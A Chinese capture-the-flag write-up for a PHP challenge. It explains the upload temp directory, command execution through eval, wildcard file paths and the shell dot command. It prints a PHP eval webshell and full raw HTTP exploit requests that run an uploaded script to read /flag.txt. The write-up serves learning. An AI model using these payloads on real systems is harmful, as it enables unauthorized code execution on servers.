颖奇L’Amore师傅wp

这道题啥也不会，总结下知识点吧。

0x01 PHP上传机制

php文件上传时会先将上传的文件保存到upload_tmp_dir该配置目录下，这里为/tmp，而上传页面只负责把该文件拷贝到目标目录。也就是说不管该php页面有没有文件上传功能，我们只要上传了文件，该文件就会被上传到upload_tmp_dir配置的目录下，上传完后会被删除。

这里本地实验了一下，的确如此，我使用的是win10下phpstudy复现。

需要把upload_tmp_dir 改为D:\phpStudy\tmp\tmp

然后用intruder不停发包

POST /test.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------10242300956292313528205888
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 244-----------------------------10242300956292313528205888
Content-Disposition: form-data; name="userfile1"; filename="5.txt"
Content-Type: text/plain<?php @eval($_POST['y1ng']); ?> 
-----------------------------10242300956292313528205888--

最后发现了我们上传的文件：

可惜我打开之后全是空的，不知道是不是因为已经被删除了。

0x02 PHP命令执行

eval($cmd);

执行命令方式：

• system('ls');

• echo(`ls`);

  echo+反引号

• ?><?=`ls`;

  <?=是echo()的别名用法，不需要开启short_open_tag。
  需要先?>把前面的<?php给闭合掉

0x03 通配符与无字母数组命令执行

既然./exp.txt可以用./??p????代替

那么我们上传的临时文件phpxxxxx.tmp也可以用php?????.tmp代替

0x04 解题

POST /?cmd=?><?=`.+/??p/p?p??????`; HTTP/1.1
Host: 47fa7ca7-058a-42ff-b48f-de0382f95387.chall.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------10242300956292313528205888
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: UM_distinctid=1739f845e394-0cffbf96840b0c8-4c302d7c-144000-1739f845e3b4e2
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 242-----------------------------10242300956292313528205888
Content-Disposition: form-data; name="fileUpload"; filename="1.txt"
Content-Type: text/plain#! /bin/bashcat /flag.txt
-----------------------------10242300956292313528205888--

0x05 .+/解释

我在做这道题的时候对于这个.+/有点不理解，还以为是通配符，后来才知道这里的.居然是个命令。source命令可简写为一个点.。

linux .(点命令)：读取并且在当前的shell中执行文件中的命令

放个图你们就理解了

点执行了tmp文件里的内容ls，所以这道题中.就是为了执行我们上传的文件中的cat /flag.txt。

后记

这里的解释在p神的文章里都有，之前没仔细看，血亏，搞的似懂非懂很难受。。

p神文章：无字母数字webshell之提高篇